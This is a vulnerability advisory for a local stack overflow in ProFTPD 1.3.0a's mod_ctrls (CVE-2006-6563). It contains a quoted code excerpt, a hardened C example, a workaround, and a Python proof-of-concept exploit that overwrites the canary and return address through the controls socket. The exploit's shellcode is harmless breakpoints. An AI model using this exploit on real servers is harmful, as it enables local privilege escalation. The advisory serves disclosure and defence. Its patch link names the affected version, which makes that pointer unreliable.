ProFTPD mod_ctrls Module Local Stack Overflow Vulnerability
Release date: 2006-12-13
Updated: 2006-12-18
Affected systems:
ProFTPD Project ProFTPD 1.3.0a
ProFTPD Project ProFTPD 1.3
Description:
BUGTRAQ ID: 21587
CVE(CAN) ID: CVE-2006-6563
ProFTPD is an open-source FTP server.
A stack-based buffer overflow exists in the mod_ctrls module of the ProFTPD server. A local attacker who is permitted to connect to the controls socket (a Unix-domain socket, so this is not reachable over the FTP port) can exploit it to execute arbitrary code on the server.
The vulnerable code is in the pr_ctrls_recv_request() function in src/ctrls.c:
----------------------------------------------------
(Code from ProFTPD 1.3.0a, src/ctrls.c)
int pr_ctrls_recv_request(pr_ctrls_cl_t *cl) {
  pr_ctrls_t *ctrl = NULL, *next_ctrl = NULL;
  char reqaction[512] = {'\0'}, *reqarg = NULL;
  size_t reqargsz = 0;
  unsigned int nreqargs = 0, reqarglen = 0;
  ...
  /* Next, read in the requested number of arguments. The client sends
   * the arguments in pairs: first the length of the argument, then the
   * argument itself. The first argument is the action, so get the first
   * matching pr_ctrls_t (if present), and add the remaining arguments to it.
   */
  /* (1) */
  if (read(cl->cl_fd, &reqarglen, sizeof(unsigned int)) < 0) {
    pr_signals_unblock();
    return -1;
  }
  /* (2) */
  if (read(cl->cl_fd, reqaction, reqarglen) < 0) {
    pr_signals_unblock();
    return -1;
  }
  ...
}
----------------------------------------------------
At (1) the unsigned integer reqarglen is read straight off the client socket and is entirely attacker-controlled; it is never compared against sizeof(reqaction). At (2) that same value is passed as the length argument to read(), so the client can have far more than 512 bytes copied into the fixed-size stack buffer reqaction, overwriting the stack canary, the saved registers and the return address. The only error handling is for read() returning -1; an oversized length is not an error as far as this code is concerned.
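The following C program is an added illustration, not ProFTPD's code and not part of the original advisory. It shows the check that is missing at (1): the client-supplied reqarglen is validated against the destination buffer before it ever reaches read(), and short reads and early EOF are treated as errors so a client cannot leave the parser with a half-filled buffer. The pipe-based harness, the function names (read_exact, recv_action_safe, try_message, try_filled) and the constructed messages are assumptions made for a stand-alone demonstration; the 545-byte case mirrors the payload length of the proof of concept further down.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define REQACTION_SZ 512   /* same size as reqaction[] in pr_ctrls_recv_request() */

/* Read exactly n bytes from fd, retrying on short reads and EINTR.
 * Returns 0 on success, -1 on error or if the stream ends early. */
static int read_exact(int fd, void *buf, size_t n) {
    unsigned char *p = buf;
    while (n > 0) {
        ssize_t r = read(fd, p, n);
        if (r < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (r == 0)
            return -1;          /* peer closed before sending the promised bytes */
        p += r;
        n -= (size_t)r;
    }
    return 0;
}

/* Hardened replacement for steps (1) and (2) (hypothetical, not ProFTPD's fix):
 * the client-supplied length is bounded by the destination buffer before it is
 * passed to read(). Returns the action length, or -1 for a malformed message. */
int recv_action_safe(int fd, char *reqaction, size_t reqaction_sz) {
    unsigned int reqarglen = 0;

    /* (1) the length word is still attacker-controlled ... */
    if (read_exact(fd, &reqarglen, sizeof reqarglen) < 0)
        return -1;

    /* ... but it is now checked: non-empty and leaving room for the NUL. */
    if (reqarglen == 0 || reqarglen >= reqaction_sz)
        return -1;

    /* (2) this read can no longer exceed the buffer */
    if (read_exact(fd, reqaction, reqarglen) < 0)
        return -1;
    reqaction[reqarglen] = '\0';
    return (int)reqarglen;
}

/* Harness: write a constructed client message (length word + body) into a pipe
 * and run the hardened reader on the other end. Returns the reader's result. */
int try_message(unsigned int claimed_len, const char *body, size_t body_len) {
    int fds[2];
    char reqaction[REQACTION_SZ];
    int rc;

    if (pipe(fds) < 0)
        return -2;
    if (write(fds[1], &claimed_len, sizeof claimed_len) != (ssize_t)sizeof claimed_len ||
        write(fds[1], body, body_len) != (ssize_t)body_len) {
        close(fds[0]);
        close(fds[1]);
        return -2;
    }
    close(fds[1]);          /* EOF after the body, like a client that hangs up */
    rc = recv_action_safe(fds[0], reqaction, sizeof reqaction);
    close(fds[0]);
    return rc;
}

/* Same, with a body of body_len 'A' bytes, mirroring the "A"*512 filler in the PoC. */
int try_filled(unsigned int claimed_len, size_t body_len) {
    char *body = malloc(body_len ? body_len : 1);
    int rc;
    if (body == NULL)
        return -2;
    memset(body, 'A', body_len);
    rc = try_message(claimed_len, body, body_len);
    free(body);
    return rc;
}

int main(void) {
    printf("legit 'stop' (len 4)        -> %d\n", try_message(4, "stop", 4));
    printf("PoC-sized 545 'A's          -> %d\n", try_filled(545, 545));
    printf("512 bytes (no room for NUL) -> %d\n", try_filled(512, 512));
    printf("claims 10, sends 3          -> %d\n", try_message(10, "abc", 3));
    return 0;
}
```

The oversized message is rejected before any of its body is read, which is the property the original code lacks; the truncated message is rejected too, because a client that promises more bytes than it sends would otherwise leave reqaction partially filled with stale stack contents.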
Example of a vulnerable configuration in proftpd.conf:
<IfModule mod_ctrls.c>
ControlsEngine on
ControlsACLs all allow group someuser
ControlsMaxClients 2
ControlsLog /var/log/proftpd/controls.log
ControlsInterval 5
ControlsSocket /tmp/ctrls.sock
ControlsSocketOwner someuser someuser
ControlsSocketACL allow group someuser
</IfModule>
Successful exploitation allows the attacker to execute arbitrary code with elevated privileges, but requires that the mod_ctrls module be enabled and that the controls ACL grant the attacker access to the socket.
<* Source: Alfredo Ortega
Link: http://secunia.com/advisories/23371/
http://marc.theaimsgroup.com/?l=bugtraq&m=116604875913163&w=2
*>
Test method:
WARNING
The following program (method) may be harmful and is provided solely for security research and teaching. Use at your own risk!
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow
import os
import os.path
import socket
import stat
import struct

# This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (Ubuntu Edgy)
#
ctrlSocket = "/tmp/ctrls.sock"   # ControlsSocket path from proftpd.conf
mySocket = "/tmp/notused.sock"   # local address the client binds before connecting

canary = b"\0\0\x0a\xff"           # gcc stack-protector terminator canary on the target
trampoline = b"\x77\xe7\xff\xff"   # jmp ESP on vdso (target-specific address)
shellcode = b"\xcc" * 9            # innocuous "int 3" breakpoints

# Build payload. The layout on the stack is:
#
# 512 bytes fill reqaction | canary | AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP | EEEE = EIP | shellcode
payload = (b"A" * 512) + canary + b"AAAABBBBCCCCDDDD" + trampoline + shellcode

# Set up the client end of the Unix-domain socket
#
if os.path.exists(mySocket):
    os.remove(mySocket)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket, stat.S_IRWXU)
s.connect(ctrlSocket)

# Send payload: the two header words the server reads before step (1) (elided in
# the excerpt above; the second is the argument count), then the attacker-chosen
# reqarglen, then the bytes read() copies into the 512-byte reqaction buffer.
#
s.sendall(b"\1\0\0\0")
s.sendall(b"\1\0\0\0")
s.sendall(struct.pack("<I", len(payload)))   # reqarglen as little-endian 32-bit (545)
s.sendall(payload)

# Finished
#
s.close()
----------------------------------------------------
Recommendations:
Temporary workaround:
* Disable the mod_ctrls module by adding the following lines to proftpd.conf:
<IfModule mod_ctrls.c>
ControlsEngine off
</IfModule>
Alternatively, administrators can use the ControlsACLs directive to restrict access to trusted local users only.
Vendor patch:
ProFTPD Project
---------------
The vendor has released an updated release to fix this security issue; please obtain it from the vendor's site:
ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.0a.tar.bz2